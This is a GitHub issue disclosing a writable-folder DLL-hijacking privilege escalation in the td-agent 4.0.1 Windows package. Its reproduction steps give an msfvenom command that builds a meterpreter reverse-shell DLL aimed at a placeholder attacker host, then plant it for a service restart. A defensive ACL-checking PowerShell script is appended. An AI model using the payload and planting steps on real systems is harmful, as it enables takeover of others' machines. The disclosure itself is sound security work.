Possible Vulnerability #3201

Closed
@zubrahzz

POC.docx
Describe the bug
Inappropriate folder permissions, possible escalation of privileges on Windows

To Reproduce
Download URL:
http://packages.treasuredata.com.s3.amazonaws.com/4/windows/td-agent-4.0.1-x64.msi
Vulnerable Path:
C:\opt\td-agent\bin

Steps in reproducing the exploit:
Creating a DLL containing a reverse shell with the specific name that ruby.exe will search:
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IPADRRESS LPORT=PORT > CRYPTBASE.dll
Setting up MSF console to listen for connection.
Copying the DLL file that we created to “C:\opt\td-agent\bin” using a limited account:
Normally, a limited user might not have the possibility of restarting the service.
A potential attacker can wait for the service to be restarted, or he can restart the machine from the command line; when the service restarts, it will trigger the DLL and get NT Authority.

Expected behavior
N/A

Your Environment
Windows 10

If you hit the problem with older fluentd version, try latest version first.

Your Configuration

Default

Your Error Log

No errors.
Additional context

Please add an appropriate contact method to submit possible vulnerabilities and POCs.
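
A defensive check for the condition reported above, as an added example that is not part of the original issue or the td-agent project: it lists every allow ACE that gives a principal outside a trusted set write access to the bin directory or to the files in it. The path comes from the issue; the trusted SID list and the function name `Get-WritableAce` are assumptions made for this example.

```powershell
# Added example: list ACEs that let non-administrative principals write to
# the td-agent bin directory or to the files inside it.
param([string]$Path = 'C:\opt\td-agent\bin')   # path named in the issue

# Assumption: only these SIDs should hold write access
# (SYSTEM, BUILTIN\Administrators, TrustedInstaller).
$trusted = @(
    'S-1-5-18',
    'S-1-5-32-544',
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
)

# Rights that allow creating or replacing a file or rewriting the ACL, plus
# the unmapped GENERIC_WRITE and GENERIC_ALL bits (0x50000000).
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, ChangePermissions, TakeOwnership' -bor 0x50000000

function Get-WritableAce {
    param([string]$Item)
    $acl = Get-Acl -LiteralPath $Item
    # Explicit and inherited rules, with identities returned as SIDs.
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs do not grant access to the object itself.
        if ($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        $name = try { $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value } catch { $ace.IdentityReference.Value }
        [pscustomobject]@{
            Item      = $Item
            Principal = $name
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

# Check the directory (file creation) and each file in it (replacement).
$items    = @($Path) + @(Get-ChildItem -LiteralPath $Path -File | ForEach-Object { $_.FullName })
$findings = @($items | ForEach-Object { Get-WritableAce -Item $_ })

if ($findings.Count -gt 0) {
    $findings | Format-Table -AutoSize
    exit 1    # non-zero exit so the check can gate a deployment or scan
}
"No write access for untrusted principals under $Path"
```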

Labels: bug, windows